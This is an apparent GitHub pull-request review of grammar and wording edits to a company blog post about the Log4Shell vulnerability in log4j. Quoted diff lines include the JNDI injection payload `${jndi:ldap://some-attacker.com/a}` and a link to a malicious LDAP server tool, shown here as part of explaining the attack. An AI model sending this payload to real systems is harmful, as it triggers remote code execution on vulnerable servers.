Edited blog post log4j-zero-day
lunasec-io/lunasec pull request #384
Opened 2021-12-22 20:43 UTC by aniratepanda

Complete edit of post, also minor corrections to announcing-lunasec. 

1h worked.

2021-12-23 21:36 UTC, factoidforrest requested changes
Nice, so many grammar and punctuation fixes!  A few of the semantic changes of sentences were incorrect though.  In most cases they can just go back to how they were where I've commented. @aniratepanda

2021-12-23 21:36 UTC, factoidforrest commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +popular Java logging library `log4j` (version 2) was discovered that resulted in Remote Code Execution (RCE), by
present tense is correct here..cant explain why but..computer words

2021-12-23 21:36 UTC, factoidforrest commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> + are quite severe concerns. We're calling it "Log4Shell" for short.
This edit doesn't make sense.  I'd leave this sentence alone actually, this is sort of standard security world phraising.

2021-12-23 21:36 UTC, factoidforrest commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +### Exploit Steps:
These are headings.  A bit like the chapter title in a book, we don't really need or want a colon.

2021-12-23 21:36 UTC, factoidforrest commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +2. The server logs the data containing the malicious payload in the request `${jndi:ldap://some-attacker.com/a}`, where `some-attacker.com` is an attacker controlled server.
unclear rewording, makes it borderline wrong.  "Server logs the data containing the malicious payload from the request." is the clearest way to say it.

2021-12-23 21:36 UTC, factoidforrest commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +exploit payload that could be used for this vulnerability. You can refer to [this malicious LDAP server](https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer
exploitation is a verb here.  Exploit is a noun.  Computers.

2021-12-23 21:36 UTC, factoidforrest commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +18. Updated post to include latest version 2.17.0 release.
Nice changing to past tense.  You can see the developer in us coming out because commit messages are present tense like this :P

2021-12-24 18:51 UTC, aniratepanda commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> + are quite severe concerns. We're calling it "Log4Shell" for short.
Yeaaa... I wasn't super satisfied with this one. I was gonna rewrite it but I didn't want to change things too much.  Frankly I think both sentences are just kinda awkward but I'll revert.

2021-12-24 18:53 UTC, aniratepanda commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +### Exploit Steps:
So because there are sequential steps bulleted, a colon is useful here.   I probably wouldn't have used it for a heading either, except there were a number of other headings that used colons for the same purpose here.   In future I'll assume no colons for headings for consistency but .... there is some inconsistency here.

2021-12-24 18:55 UTC, aniratepanda commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +exploit payload that could be used for this vulnerability. You can refer to [this malicious LDAP server](https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/jndi/LDAPRefServer
Gotcha.

2021-12-24 18:55 UTC, aniratepanda commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +18. Updated post to include latest version 2.17.0 release.
Yea just consistency.

2021-12-24 18:58 UTC, aniratepanda commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> +popular Java logging library `log4j` (version 2) was discovered that resulted in Remote Code Execution (RCE), by
Gotcha

2021-12-24 19:01 UTC, aniratepanda commented on docs/blog/2021-12-09-log4j-zero-day.mdx
> + are quite severe concerns. We're calling it "Log4Shell" for short.
You are right actually. It was better before.  I started at it too long.

2021-12-27 20:21 UTC, merged